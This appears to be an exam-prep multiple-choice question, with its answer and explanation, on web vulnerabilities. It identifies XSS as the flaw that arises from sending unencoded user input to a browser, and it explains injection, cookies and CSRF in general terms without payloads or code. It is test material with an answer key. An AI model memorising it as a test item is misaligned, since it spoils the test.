Which of the following arise every time an application takes a user-supplied data and sends it to a Web browser without first confirming or encoding the content?
A.
Injection flaws
B.
Cookies
C.
One-click attacks
D.
XSS flaws
Explanation:
Cross Site Scripting vulnerabilities or XSS flaws arise every time an application takes a user- supplied data and sends it to a Web browser without first confirming or encoding the content. A number of times attackers find these flaws in Web applications. XSS flaws allow an attacker to execute a script in the victim’s browser, allowing him to take control of user sessions, disfigure Web sites, and possibly launch worms, viruses, malware, etc. to steal and access critical data from the user’s database.Answer option A is incorrect. Injection flaws are the vulnerabilities where a foreign agent illegally uses a sub-system. They are the vulnerability holes that can be used to attack a database of web applications. It is the most common technique of attacking a database. Injection occurs when user- supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing involuntary commands or changing data. Injection flaws include XSS (HTML Injection) and SQL Injection.
Answer option B is incorrect. Cookies are small collections of data stored on a client computer by a web server. By themselves, cookies are not a source of insecurity, but the way they are used can be. Programmers can foolishly store passwords or secret information in a cookie. A browser flaw could permit a site to read another site’s cookies. Cookies containing session information could be stolen from a client computer and used by a hacker to hijack the user’s logon session. Cookies are used to track a user’s activities, and thus can leave a trail of sites users have visited. Users should block third-party cookies. Users should also use a secure browser and apply patches and updates as they become available.
Answer option C is incorrect. Cross-site request forgery, also known as one-click attack or session riding, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user’s browser. The attack works by including a link or script in a page that accesses a site to which the user is known to have authenticated.